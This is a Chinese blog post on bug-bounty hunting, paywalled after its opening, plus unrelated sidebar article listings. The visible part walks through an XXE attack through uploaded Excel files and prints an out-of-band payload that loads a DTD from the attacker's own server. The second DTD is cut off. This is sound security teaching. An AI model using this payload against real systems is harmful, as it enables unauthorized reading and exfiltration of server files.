SRC漏洞挖掘经验分享

最新推荐文章于 2024-05-15 09:08:01 发布
最新推荐文章于 2024-05-15 09:08:01 发布
阅读量185 收藏
点赞数
文章标签: 网络安全 SRC 漏洞挖掘 赏金猎人
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hongduilanjun/article/details/132671154
版权
本文分享了SRC漏洞挖掘的经验,包括利用文件解析引发的XXE漏洞,结合CSRF与逻辑漏洞的组合攻击,登录处的存储型XSS,以及论坛的存储型XSS。通过实例展示了如何利用这些漏洞进行攻击,并提出了防范措施。
摘要由CSDN通过智能技术生成

文件解析造成的XXE

图片

网站存在一个有意思的功能点,通过上传Excel会将内容显示在页面上,也就是说后端会解析Excel

Excel是通过XML来存储数据的,也就是说网站解析了XML,那么我们就可以在XML中注入语句来尝试攻击

新建一个"新建 Microsoft Excel 工作表.xlsx",将后缀改为.zip并解压

图片

尝试在"[Content_Types].xml"中注入语句,之后再压缩回.zip然后重命名为"新建 Microsoft Excel 工作表.xlsx"

<!DOCTYPE a [ <!ENTITY % b SYSTEM "http://你服务器的IP/x.dtd">%b;%c;%xxe;]>

图片

在自己服务器构造x.dtd,并开启access.log日志

<!ENTITY % c "<!EN

最低0.47元/天 解锁文章
红队蓝军
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
iOS最新面试题(一)
qq_34500366的博客
11-19 1516
1.聊下HTTP post的body体使用form-urlencoded和multipart/form-data的区别。 1)application/x-www-form-urlencoded: 窗体数据被编码为名称/值对,这是标准且默认的编码格式。当action为get时候,客户端把form数据转换成一个字串append到url后面,用?分割。当action为post时候,浏览器把form数据封装到http body中,然后发送到server。 2)multipart/form-data: multipa
【2018最新】iOS面试题(二)
程序员小咖的博客
03-21 2492
1.VC的生命周期 init:初始化程序 loadView:视图初始化 viewDidLoad:视图加载完成 viewWillAppear:视图即将显示 viewDidAppear:视图显示时调用 viewWillDisappear:视图即将消失 viewDidDisappear:视图消失时调用2.assign 和weak的区别 weak所有权修饰符表明该属性定义了一种非拥有关系,为
2020年最新iOS面试题大集合
06-28
最新iOS面试题大集合,涉及多线程、内存管理、Block、Runloop、Runtime、数据安全、性能优化等
(2024年)iOS OC面试题,Swift面试题,Flutter面试及答案
热门推荐
田风有的博客
07-17 4万+
第一大类OC面试题 一.设计模式是什么? 你知道哪些设计模式,并简要叙述? 设计模式是一种编码经验,就是用比较成熟的逻辑去处理某一种类型的事情。 1). MVC模式:Model View Control,把模型 视图 控制器 层进行解耦合编写。 2). MVVM模式:Model View ViewModel 把模型 视图 业务逻辑 层进行解耦和编写。 3). 单例模式:通过static...
2019iOS面试题大全
02-20
2019iOS面试题大全,包含100多道题,覆盖面试需要的各个方面
新手SRC漏洞挖掘经验分享
08-21
新手SRC漏洞挖掘经验分享 SRC漏洞挖掘是一个复杂的过程,需要新手们具备一定的知识和经验。在这篇文章中,我们将分享一些SRC漏洞挖掘经验和知识,包括SRC的概念、入坑潜规则、信息收集、漏洞挖掘等方面。 SRC的...
国内SRC漏洞挖掘经验和技巧分享.pdf
09-10
"SRC漏洞挖掘经验和技巧分享" 本文档主要分享SRC漏洞挖掘经验和技巧,涵盖了SRC个人推荐、SRC的规则、漏洞挖掘中的个人经验和技巧分享等方面。 一、SRC个人推荐 SRC个人推荐排名不分先后,只为排版好看白帽子...
国内SRC漏洞挖掘技巧与经验分享
01-29
本文将深入探讨国内SRC漏洞挖掘的技术和经验,帮助网络安全专业人士提升其在该领域的技能。 首先,我们要理解漏洞挖掘的基本概念。漏洞是软件或系统中存在的缺陷,可能被黑客利用来执行恶意操作,如非法访问、数据...
2024年鸿蒙最全近期漏洞挖掘实战小结,鸿蒙 高级面试
最新发布
2401_84850721的博客
05-15 343
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。打到这里的时候就直接通报相关负责老师了,没有进一步的继续利用(后悔了,应该交个SRC的555)。一个课程平台,不需要登录。
iOS面试题经典汇总
02-17
iOS面试题经典汇总,包含iOS各个模块内容的介绍。
2022年iOS最新面试(底层基础)问题答案
super_man_ww的博客
09-02 6657
fafd
iOS开发之高级面试题(一)
aipizai4609的博客
03-06 388
小编加了一个不错的面试题和iOS技巧分享群,883872094群资料可以自取 《招聘一个靠谱的 iOS》,其中共55题,除第一题为纠错题外,其他54道均为简答题。 传送门 iOS开发之高级面试题(二) iOS开发之高级面试题(三) iOS开发之高级面试题(四) 风格纠错题 优化部分 硬伤部分 什么情况使用 weak 关键字,相比 assign 有什么不同? 怎么用 copy 关键字...
新 iOS开发入职京东28k面试题
iOSvv的博客
03-29 3391
是小编今年面试经历被问到的问题,并记录下自己的笔记分享出来。喜欢的可以收藏,大家一起努力
2024 Android面试心得,已拿到offer,2024年最新iOS多线程面试题
2401_84141401的博客
04-10 367
看下invalidate方法,有带4个参数的,和不带参数有什么区别;requestLayout触发measure和layout,如何实现局部重新测量,避免全局重新测量问题。三、事件分发机制还有onTouchEvent()、onTouchListener、onClickListener的先后顺序四、消息分发机制这个考得非常常见。一定要看源码,代码不多。带着几个问题去看:1.为什么一个线程只有一个Looper、只有一个MessageQueue?
iOS面试题基础
永不止步的博客
06-29 1万+
分类、扩展、代理、通知、KVC、KVO、属性关键字 一、分类(Category) 1、分类的作用? 声明私有方法,分解体积大的类文件 2、分类的特点? 可以为系统类添加分类。在运行时时期,将 Category 中的实例方法列表、协议列表、属性列表添加到主类中后(所有Category中的方法在方法列表中的位置是在主类的同名方法之前的),然后会递归调用所有类的 load 方法,这一切都是在m...
ios面试题总结
qq_43658148的博客
06-01 961
本篇主要讲解ios中的有关内存的问题,会不断更新,有问题欢迎指出和提问哦!
华为的鸿蒙系统漏洞,华为鸿蒙系统弥补华为手机所有漏洞 做全世界os
weixin_39818631的博客
05-29 680
对于华为来说,他们正在加大投入研发,为的是能够在很多领域做到自力更生,而昨天发布的鸿蒙OS,是他们潜心准备多年的产物,其是一款全新的基于微内核的、面向全场景的分布式操作系统,能够同时满足全场景流畅体验、架构级可信安全、跨终端无缝协同以及一次开发多终端部署的要求。余承东会后接受采访时表示,鸿蒙10年前开始探索,截至目前这个项目已经投入了4000-5000人,而选择让它开源,其实是为了做全世界的OS。...
iOS经典面试题大全2021(一)(附答案)
IOSNF的博客
08-06 6032
(iOS面试资料大全) 1、简述你项目中常用的设计模式。它们有什么优缺点? 常用的设计模式有:代理、观察者、单例。 (1)单例:它是用来限制一个类只能创建一个对象。这个对象中的属性可以存储全局共享的数据。所有的类都能访问、设置此单例中的属性数据。 优点:是它只会创建一个对象容易供外界访问,节约性能。 缺点:是一个类只有一个对象,可能造成责任过重,在一定程度上违背了“单一职责原则”。单例模式中没有抽象层,所以单例类的扩展有很大的困难。不能过多创建单例,因为单例从创建到程序关闭前会一直存在,过多的单例会影响性能
国内SRC漏洞挖掘经验与技巧深度分享
"该文档是关于国内SRC(Security Response Center...这份文档提供了丰富的SRC漏洞挖掘实践经验,包括信息收集策略、端口扫描技术、字典优化和实战案例,对想要从事Web安全研究或SRC漏洞挖掘的人员具有很高的参考价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值